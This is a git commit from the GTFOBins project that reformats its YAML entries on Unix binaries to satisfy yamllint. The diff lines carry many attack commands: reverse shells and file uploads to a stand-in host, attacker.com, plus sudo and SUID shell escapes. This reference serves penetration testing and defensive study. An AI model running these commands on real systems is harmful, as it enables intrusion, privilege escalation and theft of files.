Fix YAMLs according to YAMLlint

This commit is contained in:
Andrea Cardaci 2018-07-16 15:01:50 +02:00
parent 785126ede0
commit e1cd3aed68
87 changed files with 996 additions and 1061 deletions

3
.yamllint Normal file
View File

@ -0,0 +1,3 @@
extends: default
rules:
line-length: disable

View File

@ -1,4 +1,4 @@
.PHONY: serve serve-public bundle .PHONY: serve serve-public bundle lint
serve: serve:
bundle exec jekyll serve bundle exec jekyll serve
@ -8,3 +8,6 @@ serve-public:
bundle: bundle:
bundle install bundle install
lint:
yamllint . _gtfobins/*.md

View File

@ -1,3 +1,4 @@
---
title: GTFOBins title: GTFOBins
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']

View File

@ -1,3 +1,4 @@
---
execute-interactive: execute-interactive:
label: Interactive execute label: Interactive execute
description: | description: |

View File

@ -9,15 +9,13 @@ functions:
export RPORT=12345 export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
@ -32,8 +30,7 @@ functions:
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345

View File

@ -1,6 +1,5 @@
--- ---
description: | description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
what GTFBins binaries are supported. Here some example. what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: execute-interactive:
@ -19,8 +18,7 @@ functions:
LFILE=file_to_read LFILE=file_to_read
./busybox cat "$LFILE" ./busybox cat "$LFILE"
suid-enabled: suid-enabled:
- description: It may drop the SUID privileges depending on the compilation flags - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
and the runtime configuration.
code: "./busybox sh" code: "./busybox sh"
sudo-enabled: sudo-enabled:
- code: sudo busybox sh - code: sudo busybox sh

View File

@ -1,8 +1,7 @@
--- ---
functions: functions:
upload: upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
the attacker box to collect the file.
code: | code: |
URL=http://attacker.com/ URL=http://attacker.com/
LFILE=file_to_send LFILE=file_to_send

View File

@ -7,7 +7,7 @@ functions:
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./dash -p" - code: ./dash -p
sudo-enabled: sudo-enabled:
- code: sudo dash - code: sudo dash
--- ---

View File

@ -9,9 +9,7 @@ functions:
ed file_to_write ed file_to_write
w w
file-read: file-read:
- code: 'ed file_to_read - code: ed file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo ed sudo ed

View File

@ -7,9 +7,7 @@ functions:
emacs file_to_write emacs file_to_write
C-x C-s C-x C-s
file-read: file-read:
- code: 'emacs file_to_read - code: emacs file_to_read
'
suid-enabled: suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled: sudo-enabled:

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: env /bin/sh - code: env /bin/sh
suid-enabled: suid-enabled:
- code: "./env /bin/sh -p" - code: ./env /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo env /bin/sh - code: sudo env /bin/sh
--- ---

View File

@ -1,7 +1,5 @@
--- ---
description: 'The read file content is corrupted by replacing tabs with spaces. description: The read file content is corrupted by replacing tabs with spaces.
'
functions: functions:
file-read: file-read:
- code: | - code: |

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: expect -c 'spawn /bin/sh;interact' - code: expect -c 'spawn /bin/sh;interact'
suid-enabled: suid-enabled:
- code: "./expect -c 'spawn /bin/sh -p;interact'" - code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled: sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact' - code: sudo expect -c 'spawn /bin/sh;interact'
--- ---

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: find . -exec /bin/sh \; -quit - code: find . -exec /bin/sh \; -quit
suid-enabled: suid-enabled:
- code: "./find . -exec /bin/sh -p \\; -quit" - code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled: sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit - code: sudo find . -exec /bin/sh \; -quit
--- ---

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: flock -u / /bin/sh - code: flock -u / /bin/sh
suid-enabled: suid-enabled:
- code: "./flock -u / /bin/sh -p" - code: ./flock -u / /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo flock -u / /bin/sh - code: sudo flock -u / /bin/sh
--- ---

View File

@ -1,7 +1,5 @@
--- ---
description: 'The read file content is not binary-safe. description: The read file content is not binary-safe.
'
functions: functions:
file-read: file-read:
- code: | - code: |

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: ionice /bin/sh - code: ionice /bin/sh
suid-enabled: suid-enabled:
- code: "./ionice /bin/sh -p" - code: ./ionice /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo ionice /bin/sh - code: sudo ionice /bin/sh
--- ---

View File

@ -9,15 +9,13 @@ functions:
export RPORT=12345 export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
@ -32,8 +30,7 @@ functions:
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
@ -53,7 +50,7 @@ functions:
export LFILE=file_to_read export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled: suid-enabled:
- code: "./ksh -p" - code: ./ksh -p
sudo-enabled: sudo-enabled:
- code: sudo ksh - code: sudo ksh
--- ---

View File

@ -9,9 +9,9 @@ description: |
``` ```
functions: functions:
execute-interactive: execute-interactive:
- code: "/lib/ld.so /bin/sh" - code: /lib/ld.so /bin/sh
suid-enabled: suid-enabled:
- code: "./ld.so /bin/sh -p" - code: ./ld.so /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /lib/ld.so /bin/sh - code: sudo /lib/ld.so /bin/sh
--- ---

View File

@ -8,9 +8,7 @@ functions:
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v v
file-read: file-read:
- code: 'less file_to_read - code: less file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo less /etc/profile sudo less /etc/profile

View File

@ -1,8 +1,5 @@
--- ---
description: | description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
All these examples only work with GNU `make` due to the lack of support of the
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
passing the content via stdin using `-f -`.
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |

View File

@ -5,9 +5,7 @@ functions:
man man man man
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'man file_to_read - code: man file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo man man sudo man man

View File

@ -5,9 +5,7 @@ functions:
TERM= more /etc/profile TERM= more /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'more file_to_read - code: more file_to_read
'
suid-enabled: suid-enabled:
- code: "./more file_to_read\n" - code: "./more file_to_read\n"
sudo-enabled: sudo-enabled:

View File

@ -14,9 +14,7 @@ functions:
nano file_to_write nano file_to_write
^O ^O
file-read: file-read:
- code: 'nano file_to_read - code: nano file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |

View File

@ -12,16 +12,14 @@ functions:
LPORT=12345 LPORT=12345
nc -l -p $LPORT -e /bin/sh nc -l -p $LPORT -e /bin/sh
upload: upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE" nc $RHOST $RPORT < "$LFILE"
download: download:
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
< "file_to_send"` on the attacker box to send the file.
code: | code: |
LPORT=12345 LPORT=12345
LFILE=file_to_save LFILE=file_to_save

View File

@ -1,8 +1,5 @@
--- ---
description: 'The read file content is corrupted by a leading space added to each description: The read file content is corrupted by a leading space added to each line.
line.
'
functions: functions:
file-read: file-read:
- code: | - code: |

View File

@ -1,9 +1,8 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'' - code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
@ -26,13 +25,9 @@ functions:
sh.stderr.pipe(client); sh.stderr.pipe(client);
}).listen(process.env.LPORT);' }).listen(process.env.LPORT);'
suid-enabled: suid-enabled:
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, - code: |
1, 2]});'' ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
'
sudo-enabled: sudo-enabled:
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, - code: |
2]});'' sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
--- ---

View File

@ -1,7 +1,5 @@
--- ---
description: | description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
Three spaces are added before each character in the read file, and
non-printable chars are printed as backslash escape sequences.
functions: functions:
file-read: file-read:
- code: | - code: |

View File

@ -27,8 +27,7 @@ functions:
export RPORT=12345 export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
PHP version 5.4 or later.
code: | code: |
LHOST=0.0.0.0 LHOST=0.0.0.0
LPORT=8888 LPORT=8888

View File

@ -14,9 +14,7 @@ functions:
pico file_to_write pico file_to_write
^O ^O
file-read: file-read:
- code: 'pico file_to_read - code: pico file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |

View File

@ -11,8 +11,7 @@ functions:
export LFILE="/tmp/file_to_write" export LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'data' }" puppet apply -e "file { '$LFILE': content => 'data' }"
file-read: file-read:
- description: The read file content is corrupted by the `diff` output format. The - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
actual `/usr/bin/diff` command is executed.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE puppet filebucket -l diff /dev/null $LFILE

View File

@ -3,15 +3,13 @@ functions:
execute-interactive: execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")' - code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
export LFILE=file_to_send export LFILE=file_to_send

View File

@ -3,15 +3,13 @@ functions:
execute-interactive: execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")' - code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
export LFILE=file_to_send export LFILE=file_to_send

View File

@ -3,13 +3,12 @@ functions:
execute-interactive: execute-interactive:
- code: rlwrap /bin/sh - code: rlwrap /bin/sh
file-write: file-write:
- description: This adds timestamps to the output file. This relies on the external - description: This adds timestamps to the output file. This relies on the external `echo` command.
`echo` command.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
rlwrap -l "$LFILE" echo data rlwrap -l "$LFILE" echo data
suid-enabled: suid-enabled:
- code: "./rlwrap -H /dev/null /bin/sh -p" - code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo rlwrap /bin/sh - code: sudo rlwrap /bin/sh
--- ---

View File

@ -9,8 +9,7 @@ functions:
export RPORT=12345 export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
version 1.9.2 or later.
code: | code: |
export LPORT=8888 export LPORT=8888
ruby -run -e httpd . -p $LPORT ruby -run -e httpd . -p $LPORT

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: setarch $(arch) /bin/sh - code: setarch $(arch) /bin/sh
suid-enabled: suid-enabled:
- code: "./setarch $(arch) /bin/sh -p" - code: ./setarch $(arch) /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo setarch $(arch) /bin/sh - code: sudo setarch $(arch) /bin/sh
--- ---

View File

@ -1,15 +1,13 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive: bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> - description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane

View File

@ -4,8 +4,7 @@ functions:
- description: Reconnecting may help bypassing restricted shells. - description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option. - description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
x
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
@ -27,6 +26,5 @@ functions:
ssh -F $LFILE localhost ssh -F $LFILE localhost
sudo-enabled: sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option. - description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
-i'" x
--- ---

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: stdbuf -i0 /bin/sh - code: stdbuf -i0 /bin/sh
suid-enabled: suid-enabled:
- code: "./stdbuf -i0 /bin/sh -p" - code: ./stdbuf -i0 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo stdbuf -i0 /bin/sh - code: sudo stdbuf -i0 /bin/sh
--- ---

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: strace -o /dev/null /bin/sh - code: strace -o /dev/null /bin/sh
suid-enabled: suid-enabled:
- code: "./strace -o /dev/null /bin/sh -p" - code: ./strace -o /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh - code: sudo strace -o /dev/null /bin/sh
--- ---

View File

@ -20,5 +20,5 @@ functions:
sudo-enabled: sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited: suid-limited:
- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
--- ---

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: taskset 1 /bin/sh - code: taskset 1 /bin/sh
suid-enabled: suid-enabled:
- code: "./taskset 1 /bin/sh -p" - code: ./taskset 1 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo taskset 1 /bin/sh - code: sudo taskset 1 /bin/sh
--- ---

View File

@ -1,7 +1,5 @@
--- ---
description: 'It can only append data if the destination exists. description: It can only append data if the destination exists.
'
functions: functions:
file-write: file-write:
- code: | - code: |

View File

@ -1,12 +1,10 @@
--- ---
description: | description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
Note that the shell might have its own builtin time implementation, which may
behave differently than` /usr/bin/time`, hence the absolute path.
functions: functions:
execute-interactive: execute-interactive:
- code: "/usr/bin/time /bin/sh" - code: /usr/bin/time /bin/sh
suid-enabled: suid-enabled:
- code: "./time /bin/sh -p" - code: ./time /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /usr/bin/time /bin/sh - code: sudo /usr/bin/time /bin/sh
--- ---

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: timeout 7d /bin/sh - code: timeout 7d /bin/sh
suid-enabled: suid-enabled:
- code: "./timeout 7d /bin/sh -p" - code: ./timeout 7d /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh - code: sudo timeout --foreground 7d /bin/sh
--- ---

View File

@ -1,7 +1,5 @@
--- ---
description: | description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions: functions:
file-read: file-read:
- code: | - code: |

View File

@ -1,7 +1,5 @@
--- ---
description: 'The read file content is corrupted by squashing multiple adjacent lines. description: The read file content is corrupted by squashing multiple adjacent lines.
'
functions: functions:
file-read: file-read:
- code: | - code: |

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: unshare /bin/sh - code: unshare /bin/sh
suid-enabled: suid-enabled:
- code: "./unshare -r /bin/sh" - code: ./unshare -r /bin/sh
sudo-enabled: sudo-enabled:
- code: sudo unshare /bin/sh - code: sudo unshare /bin/sh
--- ---

View File

@ -11,11 +11,9 @@ functions:
vi file_to_write vi file_to_write
w w
file-read: file-read:
- code: 'vi file_to_read - code: vi file_to_read
'
suid-enabled: suid-enabled:
- code: "./vi -c ':!/bin/sh -p'" - code: ./vi -c ':!/bin/sh -p'
sudo-enabled: sudo-enabled:
- code: sudo vi -c ':!/bin/sh' - code: sudo vi -c ':!/bin/sh'
--- ---

View File

@ -4,9 +4,9 @@ functions:
- code: watch /usr/bin/id - code: watch /usr/bin/id
suid-enabled: suid-enabled:
- description: This keeps the SUID privileges only if the `-x` option is present. - description: This keeps the SUID privileges only if the `-x` option is present.
code: "./watch -x /usr/bin/id" code: ./watch -x /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo watch /usr/bin/id - code: sudo watch /usr/bin/id
suid-limited: suid-limited:
- code: "./watch /usr/bin/id" - code: ./watch /usr/bin/id
--- ---

View File

@ -1,8 +1,7 @@
--- ---
functions: functions:
upload: upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
export LFILE=file_to_send export LFILE=file_to_send

View File

@ -1,34 +1,28 @@
--- ---
description: "`whois` hangs waiting for the remote peer to close the socket.\n" description: |
`whois` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
and its length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
whois -h $RHOST -p $RPORT "`cat $LFILE`" whois -h $RHOST -p $RPORT "`cat $LFILE`"
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file
length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
whois -h $RHOST -p $RPORT "`base64 $LFILE`" whois -h $RHOST -p $RPORT "`base64 $LFILE`"
download: download:
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
< "file_to_send"` on the attacker box to send the file. The file has instances
of `$'\x0d'` stripped.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_save LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE" whois -h $RHOST -p $RPORT > "$LFILE"
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
| nc -l -p 12345` on the attacker box to send the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345

View File

@ -3,14 +3,12 @@ functions:
execute-non-interactive: execute-non-interactive:
- code: xargs -a /dev/null /usr/bin/id - code: xargs -a /dev/null /usr/bin/id
file-read: file-read:
- description: This works as long as the file does not contain the NUL character, - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
GNU version only.
code: | code: |
LFILE=file_to_read LFILE=file_to_read
xargs -a "$LFILE" -0 xargs -a "$LFILE" -0
suid-enabled: suid-enabled:
- code: "./xargs -a /dev/null /usr/bin/id" - code: ./xargs -a /dev/null /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo xargs -a /dev/null /usr/bin/id - code: sudo xargs -a /dev/null /usr/bin/id
--- ---

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: zsh - code: zsh
suid-enabled: suid-enabled:
- code: "./zsh" - code: ./zsh
sudo-enabled: sudo-enabled:
- code: sudo zsh - code: sudo zsh
--- ---